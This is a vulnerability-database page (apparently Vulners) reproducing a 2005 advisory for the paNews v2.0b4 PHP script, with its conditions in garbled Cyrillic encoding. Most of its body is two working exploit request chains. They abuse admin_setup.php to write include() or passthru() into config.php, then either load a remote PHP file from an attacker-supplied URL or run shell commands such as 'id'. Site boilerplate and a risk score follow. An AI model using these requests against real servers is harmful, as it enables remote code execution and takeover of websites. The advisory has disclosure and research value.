Vulners
Lucene search
paNews_v2.0b4.txt
`oooo oooo oooooooo8 ooooooooooo
8888o 88 888 88 888 88
88 888o88 888oooooo 888
88 8888 888 888
o88o 88 o88oooo888 o888o
********************************
**** Network security team *****
********* nst.e-nex.com ********
********************************
* Title: paNews v2.0b4
* Bug found by: ò¸ìû÷
* Date: 20.02.2005
********************************
web: http://www.phparena.net/panews.php
google: allintitle:paNews v2.0b4
PHP Injection
Áàãà ðàáîòàåò òîëüêî åñëè:
1. register_globals=On
2. íà ïàïêó includes ñòîÿò ïðàâà íà çàïèñü
p.s. îòðóáèòå ÿâàñêðèïòû - javascripts =-]
Example 1
http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=include($nst)
then:
http://victim/panews/includes/config.php?nst=http://your/file.php
Example 2
http://victim/panews/includes/admin_setup.php?access[]=admins&do=updatesets&form[comments]=$nst&form[autoapprove]=$nst&disvercheck=$nst&installed=$asd&showcopy=passthru($nst)
then:
http://victim/panews/includes/config.php?nst=id`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Feb 2005 00:00Current
7.4High risk
Vulners AI Score7.4